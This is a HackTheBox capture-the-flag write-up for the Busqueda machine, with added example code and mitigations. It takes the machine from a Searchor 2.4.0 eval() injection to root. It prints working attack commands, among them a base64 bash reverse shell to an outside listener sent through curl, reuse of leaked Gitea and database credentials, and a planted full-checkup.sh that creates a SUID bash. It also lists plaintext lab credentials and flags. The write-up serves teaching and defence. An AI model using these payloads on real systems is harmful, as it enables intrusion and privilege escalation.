htb-writeups

Busqueda - HackTheBox Writeup

Overview

Busqueda is a Linux machine from HackTheBox. The path to root has three stages: a command injection in the Searchor 2.4.0 library behind the site's search form gives a shell as svc; a Gitea credential left in a .git/config inside the web root gives access to Gitea and, through password reuse, to sudo; and a sudo rule on a system-checkup script whose full-checkup action executes a script from the caller's current directory gives root.

Reconnaissance

Initial Nmap Scan

export target=10.129.16.87
sudo nmap -p- --min-rate 5000 -sT -vvv $target

Results: 22/tcp (SSH) and 80/tcp (HTTP) open.

Service Version Detection

sudo nmap -sC -sV -p 22,80 -T4 $target

Detailed Findings: OpenSSH on 22/tcp and an HTTP server on 80/tcp serving the searcher.htb virtual host.

Web Application Enumeration

Added the domain to hosts file:

sudo nano /etc/hosts
# Add: 10.129.16.87 searcher.htb

Visited http://searcher.htb and found a search front-end that generates search-engine URLs with the Searchor 2.4.0 Python library.

Testing Search Functionality

The form submits a POST to /search with engine and query parameters and returns a search URL built from them; the query is therefore the natural place to look for injection.

Initial Access

Vulnerability Research

Researched Searchor 2.4.0 and found the known command-injection flaw: the library's search() builds a Python expression from the engine and query strings with an f-string and passes it to eval(). A query containing a single quote breaks out of the string literal, and whatever follows is evaluated as Python, so __import__('os').system(...) runs arbitrary shell commands as the web application user.
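The following is an added example, not Searchor's own code and not part of the original writeup: a miniature model of the eval() construction next to a safe dispatch. The Engine class and build_expression() are stand-ins with a single engine; the payload keeps the writeup's shape (close the quote, add an expression, comment out the tail) but appends to a list instead of spawning a reverse shell so the script runs offline.

```python
"""Searchor 2.4.0 injection primitive, modelled in miniature (added example, not Searchor's code)."""
from urllib.parse import quote_plus

INJECTED = []  # only ever filled if attacker-supplied Python actually executes


class Engine:
    """Stand-in for searchor's Engine enum; only Google is modelled."""

    class Google:
        @staticmethod
        def search(query, copy_url=False, open_web=False):
            return "https://www.google.com/search?q=" + quote_plus(query)


def build_expression(engine: str, query: str, copy: bool = False, open_web: bool = False) -> str:
    """The string the vulnerable library hands to eval(); shown separately so the break-out is visible."""
    return f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open_web})"


def vulnerable_search(engine: str, query: str, copy: bool = False, open_web: bool = False) -> str:
    # A single quote in `query` closes the literal; everything after it is evaluated as Python.
    return eval(build_expression(engine, query, copy, open_web))


def safe_search(engine: str, query: str, copy: bool = False, open_web: bool = False) -> str:
    """Dispatch through an allow-list and pass the query as a plain argument, never as source."""
    allowed = {"Google": Engine.Google}
    try:
        eng = allowed[engine]
    except KeyError:
        raise ValueError(f"unknown engine {engine!r}") from None
    return eng.search(query, copy_url=copy, open_web=open_web)


# Same shape as the writeup's payload; the os.system(...) reverse shell is replaced by a
# harmless side effect (list append) so the effect can be observed without a listener.
PAYLOAD = "',INJECTED.append('attacker code ran')) # junky comment"


def demo() -> dict:
    """Run the payload through both implementations and report what happened."""
    before = list(INJECTED)
    vuln_result = vulnerable_search("Google", PAYLOAD)
    after_vuln = list(INJECTED)
    safe_result = safe_search("Google", PAYLOAD)
    return {
        "expression": build_expression("Google", PAYLOAD),
        "vulnerable_returned": vuln_result,
        "code_executed": after_vuln != before,          # True: the append ran inside eval()
        "safe_returned": safe_result,                    # payload is just percent-encoded text
        "safe_executed_code": list(INJECTED) != after_vuln,  # False: nothing was evaluated
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The expression key of demo() shows exactly what eval() sees: `Engine.Google.search('',INJECTED.append('attacker code ran')) # junky comment', copy_url=False, open_web=False)`. The trailing `# junky comment` is what makes the leftover `', copy_url=...` syntactically irrelevant, which is why the writeup's payload needs it.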

Reverse Shell Preparation

# Generate a base64-encoded reverse shell (-n: no trailing newline in the encoded blob)
echo -ne "bash -c 'bash -i >& /dev/tcp/10.10.14.172/4444 0>&1'" | base64
# Output: YmFzaCAgLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTcyLzQ0NDQgMD4mMSc=
# (this blob decodes with two spaces after "bash", which the shell ignores)
# Encoding keeps the quotes, redirections and '&' out of the injected Python string
# and out of the POST body; the target decodes it and pipes it to bash.

Craft Exploit Payload

# Closes the single-quoted query argument inside Searchor's eval()'d expression, adds an
# os.system() call as a second positional argument, then comments out the rest of the line.
evil_cmd="',__import__('os').system('echo YmFzaCAgLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTcyLzQ0NDQgMD4mMSc= | base64 -d | bash -i')) # junky comment"

Start Netcat Listener

nc -nlvp 4444

Execute Exploit

curl -s -X POST http://searcher.htb/search -d "engine=Google&query=${evil_cmd}"

Shell Obtained

Received a reverse shell on the listener as the svc user.

Privilege Escalation

Initial Enumeration

whoami
# svc

pwd
# /var/www/app

ls -la

Discover Git Configuration

cat /var/www/app/.git/config


Found Credentials:

url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git

Add Gitea to Hosts

# on the attacker machine; /etc/hosts is root-owned, hence tee via sudo
echo "10.129.16.87 gitea.searcher.htb" | sudo tee -a /etc/hosts

Access Gitea

With cody's credentials (cody / jh1usoih2bkjaspwe92) we can log in at http://gitea.searcher.htb/user/login.

Check Sudo Privileges

sudo -l

Note: sudo prompts for svc's password. cody's Gitea password jh1usoih2bkjaspwe92 works here, so it is reused for the svc system account.

Output:

Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
    use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

Analyze System-Checkup Script

# any unrecognised action (here the arbitrary string "ara") makes the script print its usage
sudo /usr/bin/python3 /opt/scripts/system-checkup.py ara

Script Usage:

Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inspect a certain docker container
     full-checkup  : Run a full system checkup

Enumerate Docker Containers

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps


Results:

CONTAINER ID   IMAGE                COMMAND                  CREATED       STATUS          PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   2 years ago   Up 53 minutes   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   2 years ago   Up 53 minutes   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

Inspect Gitea Container for Credentials

sudo python3 /opt/scripts/system-checkup.py docker-inspect '' gitea | jq .


Extracted Database Credentials from Environment:

"Env": [
  "USER_UID=115",
  "USER_GID=121", 
  "GITEA__database__DB_TYPE=mysql",
  "GITEA__database__HOST=db:3306",
  "GITEA__database__NAME=gitea",
  "GITEA__database__USER=gitea",
  "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh"
]

Get MySQL Container IP

sudo python3 /opt/scripts/system-checkup.py docker-inspect '' mysql_db | jq .


Network Information:

{
  "docker_gitea": {
    "IPAMConfig": null,
    "Links": null,
    "Aliases": [
      "f84a6b33fb5a",
      "db"
    ],
    "NetworkID": "cbf2c5ce8e95a3b760af27c64eb2b7cdaa71a45b2e35e6e03e2091fc14160227",
    "EndpointID": "c7fbd5f328719c833cbc947cae5b3244d831e7b010f5ef34881b483a8e6f65be",
    "Gateway": "172.19.0.1",
    "IPAddress": "172.19.0.3",
    "IPPrefixLen": 16,
    "IPv6Gateway": "",
    "GlobalIPv6Address": "",
    "GlobalIPv6PrefixLen": 0,
    "MacAddress": "02:42:ac:13:00:03",
    "DriverOpts": null
  }
}

Access MySQL Database

mysql -h 172.19.0.3 -u gitea -pyuiu1hoiu4i5ho1uh gitea


Extract User Information

-- Gitea keeps accounts in the `user` table; \G prints one column per line and needs no trailing ';'
select * from user \G


Found the administrator's password hash (100 hex characters, i.e. the 50-byte PBKDF2 output Gitea stores in the passwd column next to a per-user salt):

ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2

Password Reuse Check

The database password yuiu1hoiu4i5ho1uh is also the Gitea administrator's password: logging in to Gitea as administrator with it succeeds.
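Added example (not from the writeup or from Gitea): an offline check of whether a candidate password matches a dumped Gitea passwd/salt pair, which confirms reuse without a login attempt and works for any number of candidates. The PBKDF2 parameters (SHA-256, 10000 iterations, 50-byte key for the legacy `pbkdf2` value of passwd_hash_algo) are assumed from Gitea's source and kept as parameters; the salt and stored hash used in demo() are constructed, because the writeup does not show the salt.

```python
"""Offline password-reuse check against Gitea PBKDF2 hashes (added example, not Gitea's code)."""
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

# Assumed parameters of Gitea's legacy "pbkdf2" passwd_hash_algo: PBKDF2-HMAC-SHA256,
# 10000 iterations, 50-byte key. Newer releases encode the parameters in the algo string
# itself (e.g. "pbkdf2$50000$50"), which parse_algo() handles.
LEGACY_ITERATIONS = 10000
LEGACY_KEYLEN = 50

# The administrator hash dumped in the writeup (its salt is not shown there); used only to
# check that it has the length a 50-byte PBKDF2 output would have.
WRITEUP_ADMIN_HASH = (
    "ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4"
    "da6565ad9ff68b1d28a31eeedb1554b5dcc2"
)


def parse_algo(algo: str) -> Tuple[int, int]:
    """'pbkdf2' -> legacy defaults; 'pbkdf2$<iterations>$<keylen>' -> those values."""
    parts = algo.split("$")
    if parts[0] != "pbkdf2":
        raise ValueError(f"not a pbkdf2 algo string: {algo!r}")
    if len(parts) == 1:
        return LEGACY_ITERATIONS, LEGACY_KEYLEN
    return int(parts[1]), int(parts[2])


def gitea_pbkdf2(password: str, salt: str, iterations: int = LEGACY_ITERATIONS,
                 keylen: int = LEGACY_KEYLEN) -> str:
    """Hex digest as Gitea stores it: PBKDF2-HMAC-SHA256 over the UTF-8 password and salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations, keylen).hex()


def looks_like_pbkdf2_output(hex_digest: str, keylen: int = LEGACY_KEYLEN) -> bool:
    """Sanity check on a dumped value before spending PBKDF2 iterations on it."""
    try:
        return len(bytes.fromhex(hex_digest)) == keylen
    except ValueError:
        return False


def find_reused_password(stored_hex: str, salt: str, algo: str,
                         candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose hash matches, or None. compare_digest avoids a
    timing side channel, which matters if this ever runs against a live service."""
    iterations, keylen = parse_algo(algo)
    for cand in candidates:
        if hmac.compare_digest(gitea_pbkdf2(cand, salt, iterations, keylen), stored_hex):
            return cand
    return None


def demo() -> Optional[str]:
    """Constructed stand-in for the dump: a made-up salt and a hash of the database password."""
    salt = "c0nstruct3d"                                  # constructed; real salts are random per user
    stored = gitea_pbkdf2("yuiu1hoiu4i5ho1uh", salt)      # constructed stand-in for the dumped passwd
    # Every credential seen on the box so far, plus one filler that should not match.
    candidates = ["jh1usoih2bkjaspwe92", "yuiu1hoiu4i5ho1uh", "password"]
    return find_reused_password(stored, salt, "pbkdf2", candidates)


if __name__ == "__main__":
    print("dumped hash has PBKDF2 length:", looks_like_pbkdf2_output(WRITEUP_ADMIN_HASH))
    print("reused password:", demo())
```

To use it against a real dump, select name, salt, passwd and passwd_hash_algo from the user table and feed each row to find_reused_password() with the credentials already collected; the iteration count must come from the algo column, not from a guess, or every comparison will silently fail.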

Analyze Scripts Repository

Logged in to Gitea as administrator and reviewed the scripts repository, which holds the source of the system-checkup.py script that svc may run via sudo.

Exploit Full-Checkup Vulnerability

Reading the source shows that the full-checkup action runs ./full-checkup.sh, a path relative to the current working directory, as root. Because svc chooses the working directory when invoking sudo, svc also chooses which script root executes.
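Added example, not the box's /opt/scripts/system-checkup.py (which the writeup does not reproduce): the relative-path pattern behind full-checkup beside a hardened variant, replayed in a scratch tree so it runs as an unprivileged user. The directory layout, script contents and the rule that the script must belong to the executing account (root under sudo) are this example's own choices.

```python
"""Relative-path script execution in a sudo-permitted tool (added example, not the box's script)."""
import os
import stat
import subprocess
import tempfile

SCRIPT_NAME = "full-checkup.sh"


def run_full_checkup_vulnerable(cwd: str) -> str:
    """Vulnerable pattern: './full-checkup.sh' resolves against the caller's current directory.
    Under `sudo python3 system-checkup.py full-checkup` that directory is whatever svc chose,
    so root executes a file svc wrote."""
    proc = subprocess.run(["./" + SCRIPT_NAME], cwd=cwd, capture_output=True, text=True)
    return proc.stdout.strip()


def run_full_checkup_hardened(trusted_dir: str) -> str:
    """Hardened pattern: fixed absolute path, a regular file (not a symlink), owned by the
    account running the checkup and writable by nobody else. The caller's cwd plays no part."""
    path = os.path.join(os.path.abspath(trusted_dir), SCRIPT_NAME)
    st = os.lstat(path)  # lstat: a symlink planted at the path must not be followed
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError(f"{path}: not a regular file")
    if st.st_uid != os.geteuid():
        raise PermissionError(f"{path}: owned by uid {st.st_uid}, not the executing user")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(f"{path}: writable by group or others")
    proc = subprocess.run([path], cwd="/", capture_output=True, text=True)
    return proc.stdout.strip()


def _write_script(directory: str, body: str, mode: int) -> str:
    """Constructed helper: drop a one-line shell script into `directory`."""
    path = os.path.join(directory, SCRIPT_NAME)
    with open(path, "w") as f:
        f.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, mode)
    return path


def _refusal(trusted_dir: str) -> str:
    try:
        run_full_checkup_hardened(trusted_dir)
        return "executed"
    except PermissionError as e:
        return f"refused: {e}"


def demo() -> dict:
    """svc plants full-checkup.sh in a directory it controls and invokes the checkup from there;
    the legitimate script lives in a separate, trusted directory."""
    with tempfile.TemporaryDirectory() as attacker_dir, tempfile.TemporaryDirectory() as trusted_dir:
        _write_script(attacker_dir, "echo attacker script ran", 0o755)
        legit = _write_script(trusted_dir, "echo legitimate checkup", 0o755)

        results = {
            "vulnerable": run_full_checkup_vulnerable(attacker_dir),  # attacker's script runs
            "hardened": run_full_checkup_hardened(trusted_dir),       # cwd is irrelevant
        }
        os.chmod(legit, 0o777)  # tamper 1: trusted script left world-writable
        results["hardened_world_writable"] = _refusal(trusted_dir)
        os.remove(legit)        # tamper 2: trusted path replaced by a symlink to the attacker's file
        os.symlink(os.path.join(attacker_dir, SCRIPT_NAME), legit)
        results["hardened_symlink"] = _refusal(trusted_dir)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The ownership test compares against os.geteuid() rather than a hard-coded 0 so the example is honest when run unprivileged; when the real tool runs under sudo, euid is 0 and the check demands a root-owned script. The sudo rule itself (`/usr/bin/python3 /opt/scripts/system-checkup.py *`) is the other half of the problem: the wildcard lets svc pass any arguments, which is what makes docker-inspect and full-checkup reachable in the first place.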

Create Exploit Script:

# Written into the current directory, which is where full-checkup looks for it. When root runs it,
# /bin/bash is copied to /tmp/path and mode 4777 sets the SUID bit on the root-owned copy.
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/path\nchmod 4777 /tmp/path' > full-checkup.sh
chmod +x full-checkup.sh

Execute Privilege Escalation

sudo python3 /opt/scripts/system-checkup.py full-checkup

Gain Root Access

# -p stops bash from dropping the effective uid (root) granted by the SUID bit
/tmp/path -p

Verify Root Privileges:

id
whoami
hostname
uname -r


Flag Collection

User Flag

cat /home/svc/user.txt

User Flag: bfb79950c22bba32320a294953bbf4c2

Root Flag

cat /root/root.txt

Root Flag: e3f07a7de0fc9535337534b7b01bdabd

Conclusion

Attack Path Summary:

  1. Information Gathering: Nmap scans revealed SSH and HTTP services
  2. Web Application Analysis: Discovered Searchor 2.4.0 vulnerable to command injection
  3. Initial Compromise: Exploited command injection to gain reverse shell as svc user
  4. Lateral Movement: Found Git credentials leading to Gitea access
  5. Privilege Escalation:
    • Abused sudo permissions to run system-checkup script
    • Extracted database credentials from Docker container
    • Discovered password reuse
    • Exploited full-checkup functionality to gain root access

Security Issues Identified:

  1. Searchor 2.4.0 passes the user-supplied query into eval(), giving unauthenticated remote command execution as svc.
  2. A .git directory with a plaintext Gitea credential (cody) in its config sits inside the web application directory.
  3. Password reuse: cody's Gitea password is also svc's system password, and the Gitea database password is also the Gitea administrator's password.
  4. The sudo rule lets svc run system-checkup.py as root with any arguments, and the script's full-checkup action executes ./full-checkup.sh from the caller's current directory.
  5. The same sudo rule exposes docker-inspect, which reveals the database credentials passed to the Gitea container as environment variables.

Mitigation Recommendations:

  1. Upgrade Searchor to a release that no longer uses eval(), and treat engine and query as data, never as code.
  2. Keep .git metadata out of deployed web roots and rotate the exposed credential.
  3. Use distinct passwords per account and service, and keep database secrets out of container environment variables where the platform offers an alternative.
  4. Have system-checkup.py call full-checkup.sh by absolute path, verify ownership and permissions before executing it, and replace the sudo wildcard with the specific actions svc actually needs.


This writeup documents the complete penetration testing process for educational purposes. Always ensure you have proper authorization before testing systems.